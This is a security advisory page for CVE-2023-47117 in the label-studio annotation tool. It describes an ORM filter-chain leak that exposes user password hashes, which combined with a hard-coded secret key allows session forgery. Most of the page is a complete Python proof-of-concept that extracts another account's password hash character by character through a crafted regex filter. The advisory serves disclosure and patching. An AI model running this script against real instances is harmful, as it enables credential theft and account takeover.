Exposure of Sensitive Information to an Unauthorized Actor in label-studio | CVE-2023-47117

Q: How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Threat Intelligence

Proof of Concept

65.77% (99th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application, see which components are vulnerable, and suggest quick fixes.

Test your applications

Snyk ID: SNYK-PYTHON-LABELSTUDIO-6056277
Published: 14 Nov 2023
Disclosed: 13 Nov 2023
Credit: alex-elttam

Report a new vulnerability Found a mistake?

Introduced: 13 Nov 2023

CVE-2023-47117 (opens in a new tab) CWE-200 (opens in a new tab)

How to fix?

Upgrade label-studio to version 1.9.2.post0 or higher.

Overview

label-studio is a Label Studio annotation tool

Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor through the application's ability to set filters for filtering tasks. By exploiting Django's Object-Relational Mapper (ORM), an attacker can construct a filter chain that filters tasks based on sensitive fields of all user accounts on the platform. Because the results of the query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. Furthermore, the application had a hard-coded secret key, so an attacker who exploits this ORM Leak vulnerability to leak account password hashes can forge a session token for any user.

PoC


import argparse
import copy
import re
import string
import sys

import requests

# Candidate alphabet tried at each position of the hash: ASCII letters,
# digits and the punctuation characters '$/+=_!'.
CHARS = string.ascii_letters + string.digits + '$/+=_!'
# Size of the candidate alphabet (not referenced elsewhere in the visible script).
CHARS_LEN = len(CHARS)

# Template JSON body that test_payload() sends with PATCH to the
# /api/dm/views/<view id> endpoint. Three fields are placeholders that are
# overwritten at runtime:
#   * "id" and "project"  -> replaced in setup() from the command-line options
#   * the filter "value"  -> replaced in test_char() with the anchored regex
PAYLOAD = {
    "data": {
        "columnsDisplayType": {},
        "columnsWidth": {},
        "filters": {
            "conjunction": "and",
            "items": [
                {
                    "filter": "filter:tasks:updated_by__active_organization__active_users__password", # ORM Leak filter chain
                    "operator": "regex", # Use regex operator to filter password hash value
                    "type": "String",
                    "value": "REPLACEME"
                }
            ]
        },
        "gridWidth": 4,
        "hiddenColumns":{"explore":["tasks:inner_id"],"labeling":["tasks:id","tasks:inner_id"]},
        "ordering": [],
        "search_text": None,
        "target": "tasks",
        "title": "Default",
        "type": "list"
    },
    "id": 1, # View ID
    "project": "1" # Project ID
}

def parse_args() -> argparse.Namespace:
    """Parse the command-line options for the script.

    All four options are mandatory. The view id and project id are parsed
    as integers; the cookie string and base URL are kept as strings.

    Returns:
        The populated namespace with attributes ``view_id``,
        ``project_id``, ``cookie_str`` and ``url``.
    """
    # (flags, extra keyword arguments) per option, in help-output order.
    option_specs = (
        (('-v', '--view-id'), {'help': 'View id of the page', 'type': int}),
        (('-p', '--project-id'), {'help': 'Project id to filter tasks for', 'type': int}),
        (('-c', '--cookie-str'), {'help': 'Cookie string for authentication'}),
        (('-u', '--url'), {'help': 'Base URL to Label Studio instance'}),
    )

    cli = argparse.ArgumentParser(
        description='Leak an accounts password hash by exploiting a ORM Leak vulnerability in Label Studio'
    )
    for flags, extra in option_specs:
        cli.add_argument(*flags, required=True, **extra)

    return cli.parse_args()

def setup() -> dict:
    """Build the runtime configuration from the command-line options.

    Reads the options via ``parse_args()``, writes the view id and the
    stringified project id into the module-level ``PAYLOAD`` template, and
    assembles the two request URLs from the base URL.

    Returns:
        A dict with the keys ``COOKIE_STR``, ``URL_PATH_1`` (view update
        endpoint), ``URL_PATH_2`` (task listing endpoint) and ``PAYLOAD``
        (the module-level template object itself, not a copy).
    """
    cli_args = parse_args()
    view_id, project_id = cli_args.view_id, cli_args.project_id

    # Point the shared request template at the requested view and project.
    PAYLOAD["id"] = view_id
    PAYLOAD["project"] = str(project_id)

    view_endpoint = f"/api/dm/views/{view_id}?interaction=filter&project={project_id}"
    tasks_endpoint = (
        f"/api/tasks?page=1&page_size=1&view={view_id}&interaction=filter&project={project_id}"
    )

    return {
        'COOKIE_STR': cli_args.cookie_str,
        'URL_PATH_1': cli_args.url + view_endpoint,
        'URL_PATH_2': cli_args.url + tasks_endpoint,
        'PAYLOAD': PAYLOAD,
    }

def test_payload(config_dict: dict, payload) -> bool:
    """Apply ``payload`` to the view and report whether any task matches.

    Args:
        config_dict: Configuration as returned by ``setup()``; the keys
            ``COOKIE_STR``, ``URL_PATH_1`` and ``URL_PATH_2`` are read.
        payload: JSON-serialisable body sent with the PATCH request.

    Returns:
        ``True`` when the ``tasks`` list in the JSON response of the
        follow-up GET request contains at least one entry, else ``False``.
    """
    sys.stdout.flush()
    auth_headers = {"Cookie": config_dict["COOKIE_STR"]}

    # First request stores the filter on the view; its response is not inspected.
    requests.patch(config_dict["URL_PATH_1"], json=payload, headers=auth_headers)

    # Second request lists tasks through that view.
    listing = requests.get(config_dict['URL_PATH_2'], headers=auth_headers)
    return len(listing.json()["tasks"]) >= 1

def test_char(config_dict, known_hash, c):
    """Check whether the filtered field value starts with ``known_hash + c``.

    Builds a request body from the ``PAYLOAD`` template whose filter value
    is the regex ``^<escaped known_hash + c>`` and submits it through
    ``test_payload()``.

    Args:
        config_dict: Configuration as returned by ``setup()``; passed
            through unchanged to ``test_payload()``.
        known_hash: Prefix established so far.
        c: Single candidate character to append to the prefix.

    Returns:
        The tuple ``(known_hash + c, c)`` when ``test_payload()`` reports a
        match, otherwise ``None``.
    """
    candidate = known_hash + c

    # Work on a private copy: assigning PAYLOAD to a local only aliases it,
    # which would rewrite the shared module-level template on every call.
    request_body = copy.deepcopy(PAYLOAD)
    # re.escape keeps regex metacharacters in the candidate (such as '$' and
    # '+') literal inside the anchored pattern.
    request_body["data"]["filters"]["items"][0]["value"] = f"^{re.escape(candidate)}"

    if test_payload(config_dict, request_body):
        return (candidate, c)

    return None

def main():
    """Run the script: extend the known prefix one character at a time.

    Starts from a fixed prefix and, for each position, tries every
    character in ``CHARS`` via ``test_char()``. The first character that
    matches is appended and echoed to stdout. The loop ends as soon as a
    full pass over ``CHARS`` yields no match.
    """
    config_dict = setup()
    # By default Label Studio password hashes start with these characters
    known_hash = "pbkdf2_sha256$260000$"
    print()
    print(f"dumped: {known_hash}", end="", flush=True)

    extending = True
    while extending:
        for candidate in CHARS:
            outcome = test_char(config_dict, known_hash, candidate)
            if outcome is None:
                continue
            # Match: adopt the longer prefix and restart from the first candidate.
            known_hash, matched = outcome
            print(matched, end="", flush=True)
            break
        else:
            # No candidate matched at this position, so stop.
            extending = False

    print()


if __name__ == "__main__":
    main()

References

CVSS Base Scores

version 3.1

Attack Vector (AV)
Network
Attack Complexity (AC)
Low
Privileges Required (PR)
None
User Interaction (UI)
None

Scope (S)
Unchanged

Confidentiality (C)
High
Integrity (I)
None
Availability (A)
None

Exposure of Sensitive Information to an Unauthorized Actor Affecting label-studio package, versions [,1.9.2.post0)

Severity